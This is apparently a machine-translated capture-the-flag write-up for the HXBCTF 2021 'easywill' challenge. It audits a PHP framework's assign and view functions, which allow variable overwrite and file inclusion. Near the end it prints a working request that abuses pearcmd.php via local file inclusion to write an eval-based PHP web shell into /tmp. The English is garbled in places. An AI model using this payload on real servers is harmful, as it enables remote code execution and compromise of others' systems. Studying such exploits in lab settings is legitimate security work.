[HXBCTF 2021]easywill

This question index The code given on is very short , You need to download the framework source code , Self revision audit . I didn't find it. 2.1.5 Source code , Next up to date . I saw this question during the competition assign The function thought it was a template injection. The function thought it would explode the template variable name, so it didn't adjust it . I'm not familiar with debugging , Subconsciously, I don't want to audit the function calls of the framework

Let's start the audit , modify app/controller/IndexController.php The content of is consistent with that given in the title

Track first assign function

assign It's just a function of assignment Pass to view among

Look again view function

You can see that there are variable overrides and that the file contains

Turn on debug You can see the function call stack , The test parameters here are &name=cfile&value=1

write in shell To tmp Catalog , Why does this include pearcmd.php The reason for this is detailed in ： utilize pearcmd.php from LFI To getshell_feng The blog of -CSDN Blog

/?name=cfile&value=/usr/local/lib/php/pearcmd.php&+-c+/tmp/test2.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

Remember to use burp If the browser calls directly <> Will be url code , If you write a horse, you won't analyze it